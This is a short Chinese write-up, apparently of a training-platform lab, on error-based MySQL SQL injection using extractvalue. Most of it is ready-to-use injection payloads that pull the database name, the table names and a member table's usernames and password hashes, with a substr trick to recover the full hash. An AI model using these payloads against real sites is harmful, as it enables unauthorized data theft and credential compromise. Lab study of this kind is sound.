extractvalue(参数1,参数2)
ps:也可以用updatexml(参数1,参数2,参数3)
数据库名
?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
表名
?id=1' and extractvalue(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e)) --+
字段值
列名已用相关字符串函数(正则)试出 https://blog.csdn.net/weixin_63082823/article/details/132762547?spm=1001.2014.3001.5502
?id=1' and extractvalue(1,concat(0x7e,(select concat(name,0x3a,0x3a,password) from member limit 1,1),0x7e)) --+
欸,注意这个结果不完整噢,你拿去md5解密发现解不出来,数了数发现只有24位!这是因为extractvalue函数一次只能查询32位长度,但是吧你只求密码发现怎么样都是只有31位——
?id=1' and extractvalue(1,concat((select concat(password) from member limit 1,1),0x7e)) --+
so~,换个方法,加上substr:
前15位
?id=1' and extractvalue(1,concat(0x7e,(select substr(password,1,15) from member limit 1,1),0x7e)) --+
后15位
?id=1' and extractvalue(1,concat(0x7e,(select substr(password,16,17) from member limit 1,1),0x7e)) --+
ok拼起来就可以了,就是吧这个密码拿去md5说解密不成功,而且这个密码总在变,密码1倒是可以但是不是墨者的key。知道的UU麻烦告诉我一声呗😣